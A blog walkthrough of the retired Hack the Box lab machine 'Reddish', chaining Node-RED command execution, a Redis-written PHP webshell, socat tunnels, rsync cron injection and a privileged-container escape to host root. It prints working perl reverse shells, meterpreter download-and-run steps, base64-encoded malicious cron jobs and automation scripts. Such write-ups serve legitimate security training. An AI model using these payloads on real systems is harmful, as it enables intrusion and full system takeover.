HTB{ Reddish }

Jan 26, 2019 | 22 minutes read

Tags: hack the box, node-red, socat, redis, rsync, docker, tunnels

Reddish was a really fun box for me. It was the first HTB box I did that devled into traffic manipulation. It was also the first 50 point box I did on HTB. I remember being very satisfied after completing Reddish. While going through the box, I was very impressed with the inter-container routing and how bending traffic through multiple ‘boxes’ was necessary to progress. Overall, I think the author yuntao did a fabulous job with this box.




As usual, we start off with a masscan followed by a targeted nmap.

masscan -e tun0 --ports U:0-65535,0-65535 --rate 700 -oL masscan.

open tcp 1880 1543784903
# end


There is only one port reported as open, and nmap reports that it’s running on Node.js.

nmap -p 1880 -sC -sV -oA nmap.

1880/tcp open  http    Node.js Express framework
|_http-title: Error


Seeing Node.js suggests there’s a webapp on port 1880, so we’ll run a recursive-gobuster, a wrapper around gobuster I recently wrote.

All scans complete. Cleaning up.

A Word on Automation

A common complaint about Reddish was that the author yuntao didn’t include any checkpoints from which we could resume work if the box reset or our connections were dropped. These kind of concerns become a non-issue if we take some time to automate the steps that allow us to progress through the stages we’ve already completed. In the spirit of automating what’s been done, we’ll be taking some extra time to look at different methods that accomplish said automation.

If you would like to grab any of the scripts from this post, please feel free to do so at HTB Scripts for Retired Boxes - Reddish

Container One (aka nodered)

Browsing to any of the directories at results in the following message from the server.


However, sending a POST request gets us some different results.

curl -s -X POST


The path key has a value of /red/{id} which suggests that we should use the value associated with the id key and use that to form a URL.

Browsing to brings us to an instance of Node-RED.



This is a great chance to automate generating this URL! The POST request returns JSON. It just so happens that there’s a great command line JSON parser called jq. We can use it to easily parse the JSON returned and generate the URL we need. We automate this step because the id value is not static, and may change.

Normal json parsing with jq, formatted output

curl -s -X POST | jq

  "id": "5539bd07f6673eb6d6509a2f367fbbb7",
  "ip": "::ffff:",
  "path": "/red/{id}"

Only select the id key and don’t include quotes

curl -s -X POST | jq --raw-output .id


Use command substitution to grab the id key and echo out the full dynamic URL

curl -s -X POST | echo$(jq --raw-output .id)


Node-RED Callbacks

According to the Node-RED website

Node-RED is a programming tool for wiring together hardware devices, APIs and online services in new and interesting ways. It provides a browser-based editor that makes it easy to wire together flows using the wide range of nodes in the palette that can be deployed to its runtime in a single-click.

That sounds neat… now how about some RCE?

After playing around with Node-RED, I think it’s safe to say that there are a lot of ways to get RCE through this interface. The interface is drag-and-drop and is fairly intuitive to use. In Node-RED terms, we drag nodes onto the canvas and link them together to create flows.

We’ll be taking a look at my initial method of getting a callback and then a more streamlined approach that automates the majority of steps for initial access.

Callback Method 1

The first shell on target relies on being able to do some simple enumeration of available tools and architecture, then a perl script.

First, we need a way to run simple commands, we’ll setup a flow consisting of three nodes: inject -> exec -> debug. We’ll use this flow to determine what utilities exist on target for us to use.

Start by dragging and dropping the flow listed above and then double clicking the exec node. In the Command field, enter the command to run then click Done.


Click and drag the lines between the nodes as shown below. The two between the exec node and the debug node represent STDOUT and STDERR.


Once everything is setup, we need to click Deploy in the upper right-hand corner of the screen and then click the button on the left hand side of the inject node.



Click on the debug tab below the Deploy button to view the command’s results.


It looks like the target is fairly limited as far as tools go, but a perl callback is simple enough. As usual, we can use shellpop to quickly generate our perl command.

shellpop --payload linux/reverse/tcp/perl_1 --host --port 12345

[+] Execute this code in remote target: 

perl -e "use Socket;\$i='';\$p=12345;socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp'));if(connect(S,sockaddr_in(\$p,inet_aton(\$i)))){open(STDIN,'>&S');open(STDOUT,'>&S');open(STDERR,'>&S');exec('/bin/sh -i');};" 

Simply copy and paste the command above into the Command field of the exec node, setup a listener on kali, re-deploy the flow, and trigger the inject node. EZPZ.

nc -nvlp 12345

Ncat: Version 7.70 ( )
Ncat: Listening on :::12345
Ncat: Listening on
Ncat: Connection from
Ncat: Connection from
/bin/sh: 0: can't access tty; job control turned off
# uname -a 
Linux nodered 4.4.0-130-generic #156-Ubuntu SMP Thu Jun 14 08:53:28 UTC 2018 x86_64 GNU/Linux

\o/ - root access (nodered)

Callback Method 2

For our second method, we’ll use a Node-RED flow to download a meterpreter payload to target and then execute it for us. We can use our exec flow from earlier to check the architecture of the box with a uname -a.

Linux nodered 4.4.0-130-generic #156-Ubuntu SMP Thu Jun 14 08:53:28 UTC 2018 x86_64 GNU/Linux

Knowing that it’s a 64-bit box, we can generate a meterpreter payload.

msfvenom -o meter-rev-tcp-12345 -f elf -p linux/x64/meterpreter/reverse_tcp LHOST=tun0 LPORT=12345

Having generated the meterpreter payload, we can jot down a quick perl-oneliner to download the payload using http.

perl -e 'use File::Fetch; File::Fetch->new(uri => "")->fetch();'

We can give this a shot locally to confirm it’s working by simply opening a ncat listener on 80 and running the oneliner.

nc -nvlp 80

Ncat: Version 7.70 ( )
Ncat: Listening on :::80
Ncat: Listening on
Ncat: Connection from
Ncat: Connection from
GET /meter-rev-tcp-12345 HTTP/1.1
TE: deflate,gzip;q=0.3
Connection: TE, close
Authorization: Basic YW5vbnltb3VzOkZpbGUtRmV0Y2hAZXhhbXBsZS5jb20=
User-Agent: File::Fetch/0.52

Now that we know that works, let’s see about getting it working in Node-RED. We can use a similar layout to what we used for the perl callback: inject -> exec -> debug and just string a few shell commands to get the file downloaded onto target. Below you can see the commands we’ll be running.

mkdir -p /tmp/.stuff
cd /tmp/.stuff
perl -e 'use File::Fetch; File::Fetch->new(uri => "")->fetch();'
chmod +x /tmp/.stuff/meter-rev-tcp-12345


Fire up a netcat listener to confirm that our perl-oneliner is working (again) by deploying the flow and clicking inject.

nc -nvlp 80

Ncat: Version 7.70 ( )
Ncat: Listening on :::80
Ncat: Listening on
Ncat: Connection from
Ncat: Connection from
GET /meter-rev-tcp-12345 HTTP/1.1
User-Agent: HTTP-Tiny/0.043

That confirms that at least some of our commands are working. Now we can get a meterpreter listener up and running to actually receive the callback on port 12345.


msf > use multi/handler
msf exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost tun0
lhost => tun0
msf exploit(multi/handler) > set lport 12345
lport => 12345
msf exploit(multi/handler) > exploit -j 
[*] Exploit running as background job 0.

[*] Started reverse TCP handler on 
msf exploit(multi/handler) >

We also need to serve up our meterpreter payload.

python3 -m http.server 80

Serving HTTP on port 80 ( ...

With the python web server and metasploit both listening, let’s hit inject and get a meterpreter shell.

Window 1
════════ - - [24/Jan/2019 19:03:16] "GET /meter-rev-tcp-12345 HTTP/1.1" 200 -

Window 2
[*] Sending stage (861348 bytes) to
[*] Meterpreter session 1 opened ( -> at 2019-01-24 19:03:18 -0600

Now we’re on target with a meterpreter shell, which is great, but this was more than a few steps to get to this point. Let’s see about automating this.

Automation: Callback Method 2

Let’s begin by exporting our flow to a file that we can easily use later on. Click the hamburger (three horizontal lines) in the upper right to trigger the dropdown menu, then go to export, and click on clipboard.


That will bring up the menu below where you can export the current node configuration to your clipboard.


We can then get it into a file for use later on.

cat > automation/meter-callback-12345.flow << EOF 
[{"id":"cea62012.79d12","type":"inject","z":"e4f547ef.15841","name":"","topic":"","payload":"","payloadType":"date","repeat":"","crontab":"","once":false,"onceDelay":0.1,"x":400,"y":60,"wires":[["ad4617f5.81d8e8"]]},{"id":"ad4617f5.81d8e8","type":"exec","z":"e4f547ef.15841","command":"mkdir -p /tmp/.stuff && cd /tmp/.stuff && perl -e 'use File::Fetch; File::Fetch->new(uri => \"\")->fetch();' && chmod +x /tmp/.stuff/meter-rev-tcp-12345 && /tmp/.stuff/meter-rev-tcp-12345","addpay":true,"append":"","useSpawn":"false","timer":"","oldrc":false,"name":"","x":730,"y":120,"wires":[["81161080.0297f"],["81161080.0297f"],[]]},{"id":"81161080.0297f","type":"debug","z":"e4f547ef.15841","name":"","active":true,"tosidebar":true,"console":false,"tostatus":false,"complete":"false","x":390,"y":220,"wires":[]}]

With that done, we can create a resource file to automate the meterpreter listener setup (shown below).


use multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set lhost tun0
set lport 12345
exploit -j

Resource files can be used directly when starting msfconsole. This resource file will get our listener spun up without any additional interaction on our part.

The last piece of this is a janky bash script to glue it all together! We’ll assume this script is run out of the same folder that our script lives in.

You can find a more dynamic version at HTB Scripts for Retired Boxes - It allows you to specify a port instead of it being hardcoded.

 3cat meter-callback-12345.flow | xclip -sel clipboard
 5echo "Contents of meter-callback-12345.flow are in your clipboard"
 8echo "Browse here and import from clipboard:"
12xterm -e 'cd /tmp && python3 -m http.server 80' &
13echo "HTTP listener started"
17xterm -e 'cd /tmp && msfvenom -o meter-rev-tcp-12345 -f elf -p linux/x64/meterpreter/reverse_tcp LHOST=tun0 LPORT=12345'
18echo "Meterpreter payload created"
21msfconsole -r initial-meterpreter-setup.msf
  1. line 3: uses xclip to get the exported flow into your clipboard (i.e. just ctrl-v to get the contents)
  2. line 9: uses our earlier script to get the URL we need to browse to
  3. line 12: spawns a new terminal and gets our python listener started
  4. line 17: creates our payload
  5. line 21: starts msfconsole with our resource file

All that’s left after running this script is to go to the Node-RED interface and import the flow from your clipboard, deploy the flow, and hit inject.

If all went well, we’re now on target. A quick ls -al / shows us that we’re in a docker container.

ls -al /

total 76
drwxr-xr-x   1 root root 4096 Jul 15  2018 .
drwxr-xr-x   1 root root 4096 Jul 15  2018 ..
-rwxr-xr-x   1 root root    0 May  4  2018 .dockerenv
drwxr-xr-x   1 root root 4096 Jul 15  2018 bin
drwxr-xr-x   2 root root 4096 Jul 15  2018 boot

Also, we can examine /etc/hosts to know what the container calls itself.

 1cat /etc/hosts
 4127.0.0.1	localhost
 5::1	localhost ip6-localhost ip6-loopback
 6fe00::0	ip6-localnet
 7ff00::0	ip6-mcastprefix
 8ff02::1	ip6-allnodes
 9ff02::2	ip6-allrouters
10172.18.0.2	nodered
11172.19.0.2	nodered

nodered to Container Two (aka www)

Now that we’re in the nodered container, we need to enumerate. A quick ip addr will show us that this container has two interfaces.

ip addr

7: eth1@if8: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default 
    link/ether 02:42:ac:13:00:02 brd ff:ff:ff:ff:ff:ff
    inet brd scope global eth1
       valid_lft forever preferred_lft forever
9: eth0@if10: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default 
    link/ether 02:42:ac:12:00:02 brd ff:ff:ff:ff:ff:ff
    inet brd scope global eth0
       valid_lft forever preferred_lft forever

Using the arp cache may or may not get you the next target, a simple ping sweep will populate the entries if the arp cache is empty.

ip neigh
════════ dev eth1 lladdr 02:42:ac:13:00:04 REACHABLE dev eth0 lladdr 02:42:6c:e0:98:76 REACHABLE dev eth1 lladdr 02:42:ac:13:00:03 REACHABLE dev eth1 lladdr 02:42:06:2d:29:27 REACHABLE

Since we have a socks proxy running, we can use it coupled with proxychains to run nmap against the and addresses.

First, ensure proxychains.conf is configured correctly. There should be an entry at the bottom under ProxyList that specifys a socks4 proxy pointing at the one started by metasploit (port 1080 in our case).


# add proxy here ...
# meanwile
# defaults set to "tor"
socks4 1080

The important parts here are the -sT to specify a Connect scan, and -Pn to skip nmap’s host discovery phase. nmap scanning through a socks proxy has limitations. Basically, you’re limited to TCP Connect scans. That’s an oversimplification, but accurate enough to press on with.

proxychains nmap -sT -Pn --open,3

ProxyChains-3.1 (
Starting Nmap 7.70 ( ) at 2019-01-25 16:54 CST
Nmap scan report for
Host is up (0.22s latency).
Not shown: 1 closed port
6379/tcp open  redis

Nmap scan report for
Host is up (0.076s latency).
Not shown: 1 closed port
80/tcp open  http

So, we have a web server and a redis instance. Let’s start with browsing to the web server.

Web Access

To make the process of browsing a bit simpler, we’ll set up a meterpreter route and a socks proxy we can use to connect from kali.

First, the route.

msf exploit(multi/handler) > use post/multi/manage/autoroute
msf post(multi/manage/autoroute) > set session 1
session => 1
msf post(multi/manage/autoroute) > exploit

[!] SESSION may not be compatible with this module.
[*] Running module against
[*] Searching for subnets to autoroute.
[+] Route added to subnet from host's routing table.
[+] Route added to subnet from host's routing table.
[*] Post module execution completed
msf post(multi/manage/autoroute) > 

Next, the socks proxy.

msf post(multi/manage/autoroute) > use auxiliary/server/socks4a
msf auxiliary(server/socks4a) > exploit 
[*] Auxiliary module running as background job 1.
[*] Starting the socks4a proxy server
msf auxiliary(server/socks4a) > 

Finally, we configure firefox to use the socks proxy and browse to the site. You can see my foxyproxy config below.


Browsing to, we see the default page below.


Automation: Web Access

Since we already have a resource file, we can actually just add these two actions into our resource file. Any time we have to reestablish our initial access, the socks proxy and routes will be ready and waiting automatically.

4use multi/handler
5set payload linux/x64/meterpreter/reverse_tcp
6set lhost tun0
7set lport 12345
8set autorunscript multi_console_command -r /root/htb/reddish/post-exploit-scripts.rc 
9exploit -j 

The resource file uses the multi_console_command to run multiple post exploitation modules.


run post/multi/manage/autoroute
run auxiliary/server/socks4a

And here is what a callback looks like after adding the multi_console_command to our resource file

[*] Sending stage (861348 bytes) to
[*] Meterpreter session 1 opened ( -> at 2019-01-26 05:09:26 -0600
[*] Session ID 1 ( -> processing AutoRunScript 'multi_console_command -r /root/htb/reddish/post-exploit-scripts.rc'
[*] Running Command List ...
[*] 	Running command run post/multi/manage/autoroute
[!] SESSION may not be compatible with this module.
[*] Running module against
[*] Searching for subnets to autoroute.
[+] Route added to subnet from host's routing table.
[+] Route added to subnet from host's routing table.
[*] 	Running command run auxiliary/server/socks4a
[*] Starting the socks4a proxy server

Redis RCE

When viewing the source of the web page, we can see the following interesting function.

function getData() {
        url: "8924d0549008565c554f8128cd11fda4/ajax.php?test=get hits",
        cache: false,
        dataType: "text",
        success: function (data) {
          console.log("Number of hits:", data)
        error: function () {

There are some additional clues in the source file that suggest ajax.php is making calls to the Redis database instance.

Redis is an open source (BSD licensed), in-memory data structure store, used as a database, cache and message broker. … Depending on your use case, you can persist it either by dumping the dataset to disk every once in a while …

There is an excellent write-up about getting RCE on a Redis server here. The basic goal is to insert a file into the Redis server’s memory as part of the database, and later transfer it into a file by dumping the dataset to disk. The steps we’ll take are:

Reset the server’s configured directory


Describe where the database file (when dumped) lives on disk


Write a simple php web shell and assign it to a Redis key


Dump the database to disk


Browse to the webshell for RCE (the command output is at the end of the line)


Automation: Redis RCE

Manually performing the RCE steps is pretty tedious. We’ll use bash and curl to automate the process.


# fourth octect can change, pass it as arg1
curl -x socks4:// "http://172.19.0."${1}"/8924d0549008565c554f8128cd11fda4/ajax.php?test=flushall"
curl -x socks4:// "http://172.19.0."${1}"/8924d0549008565c554f8128cd11fda4/ajax.php?test=config%20set%20dir%20/var/www/html"
curl -x socks4:// "http://172.19.0."${1}"/8924d0549008565c554f8128cd11fda4/ajax.php?test=config%20set%20dbfilename%20backdoor.php"
curl -x socks4:// "http://172.19.0."${1}"/8924d0549008565c554f8128cd11fda4/ajax.php?test=set%20cmd%20%22%3C?php%20system(\$_GET[%27cmd%27]);%20?%3E%22"
curl -x socks4:// "http://172.19.0."${1}"/8924d0549008565c554f8128cd11fda4/ajax.php?test=bgsave"

Now, anytime we need to get our webshell uploaded, we can just run the script above with the fourth octet as an argument.

./curl-commands-for-php-shell-on-second-container 3

OKOKOKOKBackground saving started

Reverse Shell

A few which commands are enough to tell us that the Redis container has the same lack of functionality as the nodered container. Thankfully, it’s not terribly difficult to get a reverse perl callback working.

Start by uploading a statically compiled socat to the nodered container.

meterpreter > lcd /opt/static/x64
meterpreter > upload socat
[*] uploading  : socat -> socat
[*] Uploaded -1.00 B of 366.38 KiB (-0.0%): socat -> socat
[*] uploaded   : socat -> socat

Make it executable

meterpreter > shell
Process 46 created.
Channel 2422 created.
chmod +x socat

And create a listener on port 1111 that will forward all traffic it receives on port 1111 to kali on the same port

./socat tcp-listen:1111,fork,reuseaddr tcp: &

Now we need our perl callback. Keep in mind that we’re calling back to our listener inside the nodered container, that same traffic will get passed onto kali via socat. We use urlencoding so that no characters break the URL parsing done by the browser.

shellpop --payload linux/reverse/tcp/perl_1 --host --port 1111 --urlencode

[+] Execute this code in remote target: 


Pass the generated payload as the argument to the test parameter cont-2-cb


nc -nvlp 1111

$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

\o/ - access level: www-data (www)

For a quick sanity check, we’ll check /etc/hosts again.

 1cat /etc/hosts
 4127.0.0.1	localhost
 5::1	localhost ip6-localhost ip6-loopback
 6fe00::0	ip6-localnet
 7ff00::0	ip6-mcastprefix
 8ff02::1	ip6-allnodes
 9ff02::2	ip6-allrouters
10172.19.0.3	www
11172.20.0.3	www

www to Container Three (aka backup)

After some basic enumeration, we see that there is a /backup folder that contains an interesting file.


cd /var/www/html/f187a0ec71ce99642e4f0afbd441a68b
rsync -a *.rdb rsync://backup:873/src/rdb/
cd / && rm -rf /var/www/html/*
rsync -a rsync://backup:873/src/backup/ /var/www/html/
chown www-data. /var/www/html/f187a0ec71ce99642e4f0afbd441a68b

A closer look into what may be running this script turns up the following cron entry. The script is being executed as root every 3 minutes.


*/3 * * * * root sh /backup/

If you’ve never checked out Unix Wildcards Gone Wild, it’s worth a read. rsync wildcarding is one of the examples in there. We COULD leverage this backup script to get user.txt or a root shell in this container. The basic idea being we can pass arbitrary command line arguments to rsync due to it’s use of a wildcard in the command by creating a file named the argument we would like to pass.

However, we’re going to skip this step and just circle back around for user.txt after rooting the host machine.

Replicating the Filesystem

The backup script tells us exactly how to pull a piece of the filesystem from backup into www. We can pull the root of that filesystem into www and examine it at our leisure (this shell may hang, if it does, ctrl+c and re-trigger your perl callback)

mkdir /tmp/stuff && rsync -a rsync://backup:873/src /tmp/stuff

skipping non-regular file "dev/agpgart"
skipping non-regular file "dev/autofs"
skipping non-regular file "dev/btrfs-control"

After that completes, we have a view of backup’s filesystem under /tmp/stuff

ls -altr /tmp/stuff
total 100
-rwxr-xr-x  1 www-data www-data  100 May  4  2018
-rwxr-xr-x  1 www-data www-data    0 May  4  2018 .dockerenv

We can confirm a few assumptions made now that we have backup’s filesystem.

rsync is running as a service, using the configuration found in /etc/rsyncd.conf.

cat /


set -ex

service cron start

exec rsync --no-detach --daemon --config /etc/rsyncd.conf

rsync’s config says that it’s running as root and has the root of the filesystem (/) mapped to /src/. We also know from the config that we can write to the filesystem using the rsync service because of the setting read only = no.

cat /etc/rsyncd.conf

uid = root
gid = root
use chroot = no
max connections = 4
syslog facility = local5
pid file = /var/run/
log file = /var/log/rsyncd.log

path = /
comment = src path
read only = no

After poking around backup’s files(i.e. enumerating), we find another cronjob.


* * * * * root rm -rf /rdb/*

This one runs every minute, but isn’t terribly useful. However, because the rsync service allows us to write to as well as read from backup, we can actually add a new cronjob and have it executed on our behalf.

File Transfer via rsync

Let’s start by getting socat onto www. We’ll need socat to extend our reverse tunnel later on.

On kali, we’ll base64 encode the socat binary and copy it to the clipboard

base64 /opt/static/x64/socat | xclip -sel clipboard

Then, we’ll use a heredoc to easily paste it in our target window. The general steps for a heredoc are to execute the top line as a normal command (cat > socat.b64 << EOF), paste the contents of the clipboard, after the paste operation completes press return so that the cursor is on a line by itself, then type EOF and hit enter. Afterwards, there will be a base64 encoded version of socat sitting on the target machine.

cat > socat.b64 << EOF

The last thing to do is decode socat and make it executable

base64 -d socat.b64 > socat
chmod +x socat

Let’s leave socat for now and come back to create the redirection a little later.

Reverse Shell

Let’s take a look at www’s interfaces and routes to make sure we have a firm grasp on how traffic is flowing.

We know that there is traffic between this container and the backup container and it’s happening every three minutes, so there should be a corresponding entry in the arp cache.

ip neigh
════════ dev eth1 lladdr 02:42:ac:14:00:02 REACHABLE dev eth0 lladdr 02:42:ac:13:00:02 STALE dev eth0 lladdr 02:42:ac:13:00:04 DELAY

The looks promising. Let’s check our eth1 interface to see where that container should callback to.

ip addr show eth1

15: eth1@if16: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default 
    link/ether 02:42:ac:14:00:03 brd ff:ff:ff:ff:ff:ff
    inet brd scope global eth1
       valid_lft forever preferred_lft forever

Now we know that our shell needs to call from to

Let’s create a local malicious cronjob that uses our same perl callback to get from backup to www.

First, we need our new payload

shellpop --payload linux/reverse/tcp/perl_1 --host --port 2222

[+] Execute this code in remote target: 

perl -e "use Socket;\$i='';\$p=2222;socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp'));if(connect(S,sockaddr_in(\$p,inet_aton(\$i)))){open(STDIN,'>&S');open(STDOUT,'>&S');open(STDERR,'>&S');exec('/bin/sh -i');};" 

Then, we’ll add it as a cronjob to a local file


* * * * * root perl -e "use Socket;\$i='';\$p=2222;socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp'));if(connect(S,sockaddr_in(\$p,inet_aton(\$i)))){open(STDIN,'>&S');open(STDOUT,'>&S');open(STDERR,'>
&S');exec('/bin/sh -i');};"

Now, to base64 encode it and copy it to our clipboard

base64 -w0 evil.cron | xclip -sel clipboard

Finally, get it onto target (www) and base64 decode it.

echo 'KiAqICogKiAqIHJvb3QgcGVybCAtZSAidXNlIFNvY2tldDtcJGk9JzE3Mi4yMC4wLjInO1wkcD0yMjIyO3NvY2tldChTLFBGX0lORVQsU09DS19TVFJFQU0sZ2V0cHJvdG9ieW5hbWUoJ3RjcCcpKTtpZihjb25uZWN0KFMsc29ja2FkZHJfaW4oXCRwLGluZXRfYXRvbihcJGkpKSkpe29wZW4oU1RESU4sJz4mUycpO29wZW4oU1RET1VULCc+JlMnKTtvcGVuKFNUREVSUiwnPiZTJyk7ZXhlYygnL2Jpbi9zaCAtaScpO307Igo=' | base64 -d > evil.cron

Extending the Tunnel

After creating the malicious cron, we’ll also need to extend our socat tunnel so that a callback to www goes to nodered and then on to our kali machine, i.e. backup -> www:2222 -> nodered:2222 -> kali:2222

Recall that socat is already here, we just need to point traffic it receives on port 2222 to go to nodered on port 2222.

www container

./socat tcp-listen:2222,fork,reuseaddr tcp: &

Now we have a listener on www that will send traffic to nodered:2222, but we also need to setup a similar listener on nodered to send the traffic along to kali.

nodered container

./socat tcp-listen:2222,fork,reuseaddr tcp: &

Finally, we need a netcat listener on kali


ncat -nvlp 2222

Adding the cronjob

Most everything is in place, now we just need to push our cronjob over to the backup container and wait.

rsync evil.cron rsync://backup:873/src/etc/cron.d/unclean

Within a minute, we should see our netcat listener receive its callback!

Ncat: Version 7.70 ( )
Ncat: Listening on :::2222
Ncat: Listening on
Ncat: Connection from
Ncat: Connection from
/bin/sh: 0: can't access tty; job control turned off
# id 
uid=0(root) gid=0(root) groups=0(root)

\o/ - root access (backup container)

Just like the others, we’ll look at /etc/hosts

 1cat /etc/hosts
 4127.0.0.1	localhost
 5::1	localhost ip6-localhost ip6-loopback
 6fe00::0	ip6-localnet
 7ff00::0	ip6-mcastprefix
 8ff02::1	ip6-allnodes
 9ff02::2	ip6-allrouters
10172.20.0.2	backup

backup Container to the Host Machine

When looking to escape a container, a good thing to check for is whether or not the container was started with the --privileged flag. Running a container with the --privileged flag gives all capabilities to the container. It also grants access to the host’s devices (everything under the /dev folder). Since we’re root in the container, this allows us to mount the host’s filesystem.

A quick check of /dev confirms that we’re seeing host assets.

ls -al /dev

brw-rw----  1 root disk      8,   0 Jan 26 12:38 sda
brw-rw----  1 root disk      8,   1 Jan 26 12:38 sda1
brw-rw----  1 root disk      8,   2 Jan 26 12:38 sda2
brw-rw----  1 root disk      8,   3 Jan 26 12:38 sda3
brw-rw----  1 root disk      8,   4 Jan 26 12:38 sda4
brw-rw----  1 root disk      8,   5 Jan 26 12:38 sda5

We can mount the host’s filesystem with the following commands

mkdir /tmp/stuff
mount /dev/sda1 /tmp/stuff

Much like our cron callback from backup to www, we can use the same technique to callback directly from the host to kali for a full root shell.

Create another evil cronjob


* * * * * root perl -e "use Socket;\$i='';\$p=3333;socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp'));if(connect(S,sockaddr_in(\$p,inet_aton(\$i)))){open(STDIN,'>&S');open(STDOUT,'>&S');open(STDERR,'>&S');exec('/bin/sh -i');};"

base64 encode the file and copy it

base64 -w0 anotherevil.cron | xclip -sel clipboard

Add the decoded cronjob to the host’s cron.d folder

echo 'KiAqICogKiAqIHJvb3QgcGVybCAtZSAidXNlIFNvY2tldDtcJGk9JzEwLjEwLjE0LjIyJztcJHA9MzMzMztzb2NrZXQoUyxQRl9JTkVULFNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSk7aWYoY29ubmVjdChTLHNvY2thZGRyX2luKFwkcCxpbmV0X2F0b24oXCRpKSkpKXtvcGVuKFNURElOLCc+JlMnKTtvcGVuKFNURE9VVCwnPiZTJyk7b3BlbihTVERFUlIsJz4mUycpO2V4ZWMoJy9iaW4vc2ggLWknKTt9OyIK' | base64 -d > /tmp/stuff/etc/cron.d/rootshell

Then fire up netcat on kali

nc -nvlp 3333

Ncat: Version 7.70 ( )
Ncat: Listening on :::3333
Ncat: Listening on
Ncat: Connection from
Ncat: Connection from
/bin/sh: 0: can't access tty; job control turned off
# id
uid=0(root) gid=0(root) groups=0(root)
# ip a
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 00:50:56:a4:f7:9a brd ff:ff:ff:ff:ff:ff
    inet brd scope global ens33
       valid_lft forever preferred_lft forever

\o/ - root access (host machine)

Gathering Flags

Now, we can finally get around to gathering up those pesky flags.

# cat /root/root.txt
# cat /home/somaro/user.txt

I hope you enjoyed this write-up, or at least found something useful. Drop me a line on the HTB forums or in chat @ NetSec Focus.


Additional Resources

  1. recursive-gobuster
  2. HTB Scripts for Retired Boxes
  3. Metasploit resource files
  4. Redis Remote Command Execution
  5. Static Binaries
  6. Unix Wildcards Gone Wild

comments powered by Disqus